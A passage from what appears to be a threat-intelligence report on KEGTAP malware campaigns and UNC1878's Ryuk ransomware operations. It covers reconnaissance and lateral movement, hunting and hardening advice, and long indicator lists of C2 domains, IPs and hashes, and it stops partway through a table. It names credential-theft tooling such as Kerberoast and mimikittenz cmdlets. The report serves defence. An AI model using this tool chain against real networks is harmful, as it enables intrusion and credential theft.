  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the MimiKatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Activity Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfigfindstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which will trigger a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS job on a host run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • The identification of named scheduled tasks associated with ANCHOR persistence may be constructed according to the following pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAS for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability for privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins.Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Often times there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that do not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns

  • <(first|last)-name>: Important Information
  • <Company Name>
  • <Company Name> complaint
  • <(first|last)-name>
  • <(first|last)-name>
  • Agreement cancellation message
  • Agreement cancellation notice
  • Agreement cancellation notification
  • Agreement cancellation reminder
  • Agreement suspension message
  • Agreement suspension notice
  • Agreement suspension notification
  • Agreement suspension reminder
  • Arrangement cancellation message
  • Arrangement cancellation notice
  • Arrangement cancellation notification
  • Arrangement cancellation reminder
  • Arrangement suspension message
  • Arrangement suspension notice
  • Arrangement suspension notification
  • Arrangement suspension reminder
  • Contract cancellation message
  • Contract cancellation notice
  • Contract cancellation notification
  • Contract cancellation reminder
  • Contract suspension message
  • Contract suspension notice
  • Contract suspension notification
  • Contract suspension reminder
  • debit confirmation
  • FW: <Name> Annual Bonus Report is Ready
  • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for October
  • RE: <Company Name> - my visit
  • RE: <Company Name> Employee Survey
  • RE: <Company Name> office
  • RE: <Name> about complaint
  • RE: <Name> bonus
  • RE: <Name> termination list
  • RE: <Name>
  • RE: <Company Name> office
  • RE: <(first|last)-name>
  • RE: <(first|last)-name> <(first|last)-name>: complaint
  • RE: <(first|last)-name>: Subpoena
  • RE: <(first|last)-name>
  • RE: <(first|last)-name>: Your Payslip for September
  • RE: about complaint
  • RE: Adopted Filer Forms
  • RE: Business hours adjustment
  • RE: Business hours realignment
  • RE: Business hours rearrangement
  • RE: Business hours restructuring
  • RE: Business schedule adjustment
  • RE: Business schedule realignment
  • RE: Business schedule rearrangement
  • RE: Business schedule restructuring
  • RE: call me
  • RE: changes
  • RE: complaint
  • RE: Complaint in <Company Name>.
  • RE: Complaint on <Name>
  • RE: customer request
  • RE: debit confirmation
  • RE: document copy
  • RE: documents list
  • RE: Edgar Filer forms renovations
  • RE: employee bonuses
  • RE: Filer Forms adaptations
  • RE: my call
  • RE: New filer form types
  • RE: office
  • RE: our meeting
  • RE: Payroll Register
  • RE: report confirmation
  • RE: situation
  • RE: Subpoena
  • RE: termination
  • RE: till 2 pm
  • RE: Urgent <Company Name> Employee Internal Survey
  • RE: visit
  • RE: what about your opinion?
  • RE: what time?
  • RE: why
  • RE: why this debit
  • RE: Working schedule adjustment
  • RE: Working schedule realignment
  • RE: Working schedule rearrangement
  • RE: Working schedule restructuring
  • RE: Your Payslip for September

Example Malware Family MD5s

  • KEGTAP
    • df00d1192451268c31c1f8568d1ff472
  • BEERBOT
    • 6c6a2bfa5846fab374b2b97e65095ec9
  • SINGLEMALT
    • 37aa5690094cb6d638d0f13851be4246
  • STILLBOT
    • 3176c4a2755ae00f4fffe079608c7b25
  • WINEKEY
    • 9301564bdd572b0773f105287d8837c4
  • CORKBOT
    • 0796f1c1ea0a142fc1eb7109a44c86cb

Code Signing Certificate CNs

  • ARTBUD RADOM SP Z O O
  • BESPOKE SOFTWARE SOLUTIONS LIMITED
  • Best Fud, OOO
  • BlueMarble GmbH
  • CHOO FSP, LLC
  • Company Megacom SP Z O O
  • ESTELLA, OOO
  • EXON RENTAL SP Z O O
  • Geksan LLC
  • GLOBAL PARK HORIZON SP Z O O
  • Infinite Programming Limited
  • James LTH d.o.o.
  • Logika OOO
  • MADAS d.o.o.
  • MUSTER PLUS SP Z O O
  • NEEDCODE SP Z O O
  • Nordkod LLC
  • NOSOV SP Z O O
  • OOO MEP
  • PLAN CORP PTY LTD
  • REGION TOURISM LLC
  • RESURS-RM OOO
  • Retalit LLC
  • Rumikon LLC
  • SNAB-RESURS, OOO
  • TARAT d.o.o.
  • TES LOGISTIKA d.o.o.
  • VAS CO PTY LTD
  • VB CORPORATE PTY. LTD.
  • VITA-DE d.o.o.

UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s

First Seen

Domain

12/11/19

updatemanagir[.]us

12/20/19

cmdupdatewin[.]com

12/26/19

scrservallinst[.]info

1/10/20

winsystemupdate[.]com

1/11/20

jomamba[.]best

1/13/20

updatewinlsass[.]com

1/16/20

winsysteminfo[.]com

1/20/20

livecheckpointsrs[.]com

1/21/20

ciscocheckapi[.]com

1/28/20

timesshifts[.]com

1/29/20

cylenceprotect[.]com

1/30/20

sophosdefence[.]com

1/30/20

taskshedulewin[.]com

1/30/20

windefenceinfo[.]com

1/30/20

lsasswininfo[.]com

1/30/20

update-wind[.]com

1/30/20

lsassupdate[.]com

1/30/20

renovatesystem[.]com

1/31/20

updatewinsoftr[.]com

2/2/20

cleardefencewin[.]com

2/2/20

checkwinupdate[.]com

2/2/20

havesetup[.]net

2/3/20

update-wins[.]com

2/3/20

conhostservice[.]com

2/4/20

microsoftupdateswin[.]com

2/4/20

iexploreservice[.]com

2/12/20

avrenew[.]com

2/12/20

target-support[.]online

2/12/20

web-analysis[.]live

2/14/20

freeallsafe[.]com

2/17/20

windefens[.]com

2/17/20

defenswin[.]com

2/17/20

easytus[.]com

2/17/20

greattus[.]com

2/17/20

livetus[.]com

2/17/20

comssite[.]com

2/17/20

findtus[.]com

2/17/20

bigtus[.]com

2/17/20

aaatus[.]com

2/17/20

besttus[.]com

2/17/20

firsttus[.]com

2/17/20

worldtus[.]com

2/26/20

freeoldsafe[.]com

2/26/20

serviceupdates[.]net

2/26/20

topserviceupdater[.]com

2/27/20

myserviceupdater[.]com

2/29/20

myservicebooster[.]net

2/29/20

servicesbooster[.]org

2/29/20

brainschampions[.]com

2/29/20

myservicebooster[.]com

2/29/20

topservicesbooster[.]com

2/29/20

servicesbooster[.]com

2/29/20

topservicesecurity[.]org

2/29/20

topservicesecurity[.]net

2/29/20

topsecurityservice[.]net

2/29/20

myyserviceupdater[.]com

2/29/20

topservicesupdate[.]com

2/29/20

topservicesecurity[.]com

2/29/20

servicesecurity[.]org

2/29/20

myserviceconnect[.]net

3/2/20

topservicesupdates[.]com

3/2/20

yoursuperservice[.]com

3/2/20

topservicehelper[.]com

3/2/20

serviceuphelper[.]com

3/2/20

serviceshelpers[.]com

3/2/20

boostsecuritys[.]com

3/3/20

hakunamatatata[.]com

3/8/20

service-updater[.]com

3/9/20

secondserviceupdater[.]com

3/9/20

twelvethserviceupdater[.]com

3/9/20

twentiethservicehelper[.]com

3/9/20

twelfthservicehelper[.]com

3/9/20

tenthservicehelper[.]com

3/9/20

thirdserviceupdater[.]com

3/9/20

thirdservicehelper[.]com

3/9/20

tenthserviceupdater[.]com

3/9/20

thirteenthservicehelper[.]com

3/9/20

seventeenthservicehelper[.]com

3/9/20

sixteenthservicehelper[.]com

3/9/20

sixthservicehelper[.]com

3/9/20

seventhservicehelper[.]com

3/9/20

seventhserviceupdater[.]com

3/9/20

sixthserviceupdater[.]com

3/9/20

secondservicehelper[.]com

3/9/20

ninthservicehelper[.]com

3/9/20

ninethserviceupdater[.]com

3/9/20

fourteenthservicehelper[.]com

3/9/20

fourthserviceupdater[.]com

3/9/20

firstserviceupdater[.]com

3/9/20

firstservisehelper[.]com

3/9/20

fifthserviceupdater[.]com

3/9/20

eleventhserviceupdater[.]com

3/9/20

fifthservicehelper[.]com

3/9/20

fourservicehelper[.]com

3/9/20

eighthservicehelper[.]com

3/9/20

eighteenthservicehelper[.]com

3/9/20

eighthserviceupdater[.]com

3/9/20

fifteenthservicehelper[.]com

3/9/20

nineteenthservicehelper[.]com

3/9/20

eleventhservicehelper[.]com

3/14/20

thirdservice-developer[.]com

3/14/20

fifthservice-developer[.]com

3/15/20

firstservice-developer[.]com

3/16/20

fourthservice-developer[.]com

3/16/20

ninethservice-developer[.]com

3/16/20

seventhservice-developer[.]com

3/16/20

secondservice-developer[.]com

3/16/20

sixthservice-developer[.]com

3/16/20

tenthservice-developer[.]com

3/16/20

eithtservice-developer[.]com

3/17/20

servicedupdater[.]com

3/17/20

service-updateer[.]com

3/19/20

sexyservicee[.]com

3/19/20

serviceboostnumberone[.]com

3/19/20

servicedbooster[.]com

3/19/20

service-hunter[.]com

3/19/20

servicedhunter[.]com

3/19/20

servicedpower[.]com

3/19/20

sexycservice[.]com

3/23/20

yourserviceupdater[.]com

3/23/20

top-serviceupdater[.]com

3/23/20

top-servicebooster[.]com

3/23/20

serviceshelps[.]com

3/23/20

servicemonsterr[.]com

3/23/20

servicehunterr[.]com

3/23/20

service-helpes[.]com

3/23/20

servicecheckerr[.]com

3/23/20

newservicehelper[.]com

3/23/20

huntersservice[.]com

3/23/20

helpforyourservice[.]com

3/23/20

boostyourservice[.]com

3/26/20

developmasters[.]com

3/26/20

actionshunter[.]com

5/4/20

info-develop[.]com

5/4/20

ayechecker[.]com

5/4/20

service-booster[.]com

9/18/20

zapored[.]com

9/22/20

gtrsqer[.]com

9/22/20

chalengges[.]com

9/22/20

caonimas[.]com

9/22/20

hakunaman[.]com

9/22/20

getinformationss[.]com

9/22/20

nomadfunclub[.]com

9/22/20

harddagger[.]com

9/22/20

errvghu[.]com

9/22/20

reginds[.]com

9/22/20

gameleaderr[.]com

9/22/20

razorses[.]com

9/22/20

vnuret[.]com

9/22/20

regbed[.]com

9/22/20

bouths[.]com

9/23/20

ayiyas[.]com

9/23/20

serviceswork[.]net

9/23/20

moonshardd[.]com

9/23/20

hurrypotter[.]com

9/23/20

biliyilish[.]com

9/23/20

blackhoall[.]com

9/23/20

checkhunterr[.]com

9/23/20

daggerclip[.]com

9/23/20

check4list[.]com

9/24/20

chainnss[.]com

9/29/20

hungrrybaby[.]com

9/30/20

martahzz[.]com

10/1/20

jonsonsbabyy[.]com

10/1/20

wondergodst[.]com

10/1/20

zetrexx[.]com

10/1/20

tiancaii[.]com

10/1/20

cantliee[.]com

10/1/20

realgamess[.]com

10/1/20

maybebaybe[.]com

10/1/20

saynoforbubble[.]com

10/1/20

chekingking[.]com

10/1/20

rapirasa[.]com

10/1/20

raidbossa[.]com

10/1/20

mountasd[.]com

10/1/20

puckhunterrr[.]com

10/1/20

pudgeee[.]com

10/1/20

loockfinderrs[.]com

10/1/20

lindasak[.]com

10/1/20

bithunterr[.]com

10/1/20

voiddas[.]com

10/1/20

sibalsakie[.]com

10/1/20

giveasees[.]com

10/1/20

shabihere[.]com

10/1/20

tarhungangster[.]com

10/1/20

imagodd[.]com

10/1/20

raaidboss[.]com

10/1/20

sunofgodd[.]com

10/1/20

rulemonster[.]com

10/1/20

loxliver[.]com

10/1/20

servicegungster[.]com

10/1/20

kungfupandasa[.]com

10/2/20

check1domains[.]com

10/5/20

sweetmonsterr[.]com

10/5/20

qascker[.]com

10/7/20

remotessa[.]com

10/7/20

cheapshhot[.]com

10/7/20

havemosts[.]com

10/7/20

unlockwsa[.]com

10/7/20

sobcase[.]com

10/7/20

zhameharden[.]com

10/7/20

mixunderax[.]com

10/7/20

bugsbunnyy[.]com

10/7/20

fastbloodhunter[.]com

10/7/20

serviceboosterr[.]com

10/7/20

servicewikii[.]com

10/7/20

secondlivve[.]com

10/7/20

quwasd[.]com

10/7/20

luckyhunterrs[.]com

10/7/20

wodemayaa[.]com

10/7/20

hybriqdjs[.]com

10/7/20

gunsdrag[.]com

10/7/20

gungameon[.]com

10/7/20

servicemount[.]com

10/7/20

servicesupdater[.]com

10/7/20

service-boosterr[.]com

10/7/20

serviceupdatter[.]com

10/7/20

dotmaingame[.]com

10/12/20

backup1service[.]com

10/13/20

bakcup-monster[.]com

10/13/20

bakcup-checker[.]com

10/13/20

backup-simple[.]com

10/13/20

backup-leader[.]com

10/13/20

backup-helper[.]com

10/13/20

service-checker[.]com

10/13/20

nasmastrservice[.]com

10/14/20

service-leader[.]com

10/14/20

nas-simple-helper[.]com

10/14/20

nas-leader[.]com

10/14/20

boost-servicess[.]com

10/14/20

elephantdrrive[.]com

10/15/20

service-hellper[.]com

10/16/20

top-backuphelper[.]com

10/16/20

best-nas[.]com

10/16/20

top-backupservice[.]com

10/16/20

bestservicehelper[.]com

10/16/20

backupnas1[.]com

10/16/20

backupmastter[.]com

10/16/20

best-backup[.]com

10/17/20

viewdrivers[.]com

10/19/20

topservicebooster[.]com

10/19/20

topservice-masters[.]com

10/19/20

topbackupintheworld[.]com

10/19/20

topbackup-helper[.]com

10/19/20

simple-backupbooster[.]com

10/19/20

top3-services[.]com

10/19/20

backup1services[.]com

10/21/20

backupmaster-service[.]com

10/21/20

backupmasterservice[.]com

10/21/20

service1updater[.]com

10/21/20

driverdwl[.]com

10/21/20

backup1master[.]com

10/21/20

boost-yourservice[.]com

10/21/20

checktodrivers[.]com

10/21/20

backup1helper[.]com

10/21/20

driver1updater[.]com

10/21/20

driver1master[.]com

10/23/20

view-backup[.]com

10/23/20

top3servicebooster[.]com

10/23/20

servicereader[.]com

10/23/20

servicehel[.]com

10/23/20

driver-boosters[.]com

10/23/20

service1update[.]com

10/23/20

service-hel[.]com

10/23/20

driver1downloads[.]com

10/23/20

service1view[.]com

10/23/20

backups1helper[.]com

10/25/20

idriveview[.]com

10/26/20

debug-service[.]com

10/26/20

idrivedwn[.]com

10/28/20

driverjumper[.]com

10/28/20

service1boost[.]com

10/28/20

idriveupdate[.]com

10/28/20

idrivehepler[.]com

10/28/20

idrivefinder[.]com

10/28/20

idrivecheck[.]com

10/28/20

idrivedownload[.]com

 

First Seen

Server

Subject

MD5

12/12/19

140.82.60.155:443

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

12/21/19

96.30.192.141:443

CN=cmdupdatewin[.]com

3d4de17df25412bb714fda069f6eb27e

1/6/20

45.76.49.78:443

CN=scrservallinst[.]info

cd6035bd51a44b597c1e181576dd44d9

1/8/20

149.248.58.11:443

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/9/20

96.30.193.57:443

CN=winsystemupdate[.]com

e4e732502b9658ea3380847c60b9e0fe

1/14/20

95.179.219.169:443

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

1/16/20

140.82.27.146:443

CN=winsysteminfo[.]com

29e656ba9d5d38a0c17a4f0dd855b37e

1/19/20

45.32.170.9:443

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/20/20

207.148.8.61:443

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/28/20

209.222.108.106:443

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

1/29/20

31.7.59.141:443

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

1/29/20

79.124.60.117:443

C=US

9722acc9740d831317dd8c1f20d8cfbe

1/29/20

66.42.86.61:443

CN=lsassupdate[.]com

3c9b3f1e12473a0fd28dc37071168870

1/29/20

45.76.20.140:443

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/29/20

45.76.20.140:80

CN=cylenceprotect[.]com

da6ce63f4a52244c3dced32f7164038a

1/30/20

149.248.5.240:443

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

144.202.12.197:80

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.248.5.240:80

CN=sophosdefence[.]com

e9b4b649c97cdd895d6a0c56015f2e68

1/30/20

149.28.246.25:80

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

144.202.12.197:443

CN=windefenceinfo[.]com

c6c63024b18f0c5828bd38d285e6aa58

1/30/20

149.28.246.25:443

CN=lsasswininfo[.]com

f9af8b7ddd4875224c7ce8aae8c1b9dd

1/30/20

45.77.119.212:443

CN=taskshedulewin[.]com

e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

45.77.119.212:80

CN=taskshedulewin[.]com

e1dc7cecd3cb225b131bdb71df4b3079

1/30/20

149.28.122.130:443

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

45.32.170.9:80

CN=livecheckpointsrs[.]com

1de9e9aa8363751c8a71c43255557a97

1/30/20

149.248.58.11:80

CN=updatewinlsass[.]com

8c581979bd11138ffa3a25b895b97cc0

1/30/20

149.28.122.130:80

CN=renovatesystem[.]com

734c26d93201cf0c918135915fdf96af

1/30/20

207.148.8.61:80

CN=ciscocheckapi[.]com

97ca76ee9f02cfda2e8e9729f69bc208

1/31/20

81.17.25.210:443

CN=update-wind[.]com

877bf6c685b68e6ddf23a4db3789fcaa

1/31/20

31.7.59.141:80

CN=updatewinsoftr[.]com

07f9f766163c344b0522e4e917035fe1

2/2/20

155.138.214.247:80

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

155.138.214.247:443

CN=cleardefencewin[.]com

61df4864dc2970de6dcee65827cc9a54

2/2/20

45.76.231.195:443

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/2/20

45.76.231.195:80

CN=checkwinupdate[.]com

d8e5dddeec1a9b366759c7ef624d3b8c

2/3/20

46.19.142.154:443

CN=havesetup[.]net

cd354c309f3229aff59751e329d8243a

2/3/20

95.179.219.169:80

CN=jomamba[.]best

80b7001e5a6e4bd6ec79515769b91c8b

2/3/20

140.82.60.155:80

CN=updatemanagir[.]us

ec16be328c09473d5e5c07310583d85a

2/3/20

209.222.108.106:80

CN=timesshifts[.]com

2bb464585f42180bddccb50c4a4208a5

2/3/20

66.42.118.123:443

CN=conhostservice[.]com

6c21d3c5f6e8601e92ae167a7cff721c

2/4/20

80.240.18.106:443

CN=microsoftupdateswin[.]com

27cae092ad6fca89cd1b05ef1bb73e62

2/4/20

95.179.215.228:443

CN=iexploreservice[.]com

26010bebe046b3a33bacd805c2617610

2/12/20

155.138.216.133:443

CN=defenswin[.]com

e5005ae0771fcc165772a154b7937e89

2/12/20

45.32.130.5:443

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

2/14/20

45.76.167.35:443

CN=freeallsafe[.]com

85f743a071a1d0b74d8e8322fecf832b

2/14/20

45.63.95.187:443

CN=easytus[.]com

17de38c58e04242ee56a9f3a94e6fd53

2/17/20

45.77.89.31:443

CN=besttus[.]com

2bda8217bdb05642c995401af3b5c1f3

2/17/20

95.179.147.215:443

CN=windefens[.]com

57725c8db6b98a3361e0d905a697f9f8

2/17/20

155.138.216.133:443

CN=defenswin[.]com

c07774a256fc19036f5c8c60ba418cbf

2/17/20

104.238.190.126:443

CN=aaatus[.]com

4039af00ce7a5287a3e564918edb77cf

2/17/20

144.202.83.4:443

CN=greattus[.]com

7f0fa9a608090634b42f5f17b8cecff0

2/17/20

104.156.245.0:443

CN=comssite[.]com

f5bb98fafe428be6a8765e98683ab115

2/17/20

45.32.30.162:443

CN=bigtus[.]com

698fc23ae111381183d0b92fe343b28b

2/17/20

108.61.242.184:443

CN=livetus[.]com

8bedba70f882c45f968c2d99b00a708a

2/17/20

207.148.15.31:443

CN=findtus[.]com

15f07ca2f533f0954bbbc8d4c64f3262

2/17/20

149.28.15.247:443

CN=firsttus[.]com

88e8551f4364fc647dbf00796536a4c7

2/21/20

155.138.136.182:443

CN=worldtus[.]com

b31f38b2ccbbebf4018fe5665173a409

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/25/20

45.77.58.172:443

CN=freeoldsafe[.]com

a46e77b92e1cdfec82239ff54f2c1115

2/26/20

108.61.72.29:443

CN=myserviceconnect[.]net

9f551008f6dcaf8e6fe363caa11a1aed

2/27/20

216.155.157.249:443

CN=myserviceupdater[.]com

4c6a2c06f1e1d15d6be8c81172d1c50c

2/28/20

45.77.98.157:443

CN=topservicesbooster[.]com

ba4b34962390893852e5cc7fa7c75ba2

2/28/20

104.156.250.132:443

CN=myservicebooster[.]com

89be5670d19608b2c8e261f6301620e1

2/28/20

149.28.50.31:443

CN=topsecurityservice[.]net

77e2878842ab26beaa3ff24a5b64f09b

2/28/20

149.28.55.197:443

CN=myyserviceupdater[.]com

0dd8fde668ff8a301390eef1ad2f9b83

2/28/20

207.246.67.70:443

CN=servicesecurity[.]org

c88098f9a92d7256425f782440971497

2/28/20

63.209.33.131:443

CN=serviceupdates[.]net

16e86a9be2bdf0ddc896bc48fcdbb632

2/29/20

45.77.206.105:443

CN=myservicebooster[.]net

6e09bb541b29be7b89427f9227c30a32

2/29/20

140.82.5.67:443

CN=servicesbooster[.]org

42d2d09d08f60782dc4cded98d7984ed

2/29/20

108.61.209.123:443

CN=brainschampions[.]com

241ab042cdcb29df0a5c4f853f23dd31

2/29/20

104.156.227.250:443

CN=servicesbooster[.]com

f45f9296ff2a6489a4f39cd79c7f5169

2/29/20

140.82.10.222:443

CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

2/29/20

149.28.35.35:443

CN=topservicesecurity[.]org

82bd8a2b743c7cc3f3820e386368951d

2/29/20

207.148.21.17:443

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

2/29/20

45.77.153.72:443

CN=topservicesupdate[.]com

8330c3fa8ca31a76dc8d7818fd378794

3/1/20

140.82.10.222:80

CN=topservicesecurity[.]net

b9375e7df4ee0f83d7abb179039dc2c5

3/1/20

207.148.21.17:80

CN=topserviceupdater[.]com

ece184f8a1309b781f912d4f4d65738e

3/1/20

108.61.90.90:443

CN=topservicesecurity[.]com

696aeb86d085e4f6032e0a01c496d26c

3/1/20

45.32.130.5:80

CN=avrenew[.]com

f32ee1bb35102e5d98af81946726ec1b

3/2/20

217.69.15.175:443

CN=serviceshelpers[.]com

9a437489c9b2c19c304d980c17d2e0e9

3/2/20

155.138.135.182:443

CN=topservicesupdates[.]com

b9deff0804244b52b14576eac260fd9f

3/2/20

95.179.210.8:80

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/2/20

45.76.45.162:443

CN=boostsecuritys[.]com

7d316c63bdc4e981344e84a017ae0212

3/4/20

108.61.176.237:443

CN=yoursuperservice[.]com

7424aaede2f35259cf040f3e70d707be

3/4/20

207.246.67.70:443

CN=servicesecurity[.]org

d66cb5528d2610b39bc3cecc20198970

3/6/20

188.166.52.176:443

CN=top-servicebooster[.]com

f882c11b294a94494f75ded47f6f0ca0

3/7/20

149.248.56.113:443

CN=topservicehelper[.]com

2a29e359126ec5b746b1cc52354b4adf

3/8/20

199.247.13.144:443

CN=hakunamatatata[.]com

e2cd3c7e2900e2764da64a719096c0cb

3/8/20

95.179.210.8:443

CN=serviceuphelper[.]com

bb65efcead5b979baee5a25756e005d8

3/8/20

207.246.67.70:443

CN=servicesecurity[.]org

d89f6bdc59ed5a1ab3c1ecb53c6e571c

3/9/20

194.26.29.230:443

CN=secondserviceupdater[.]com

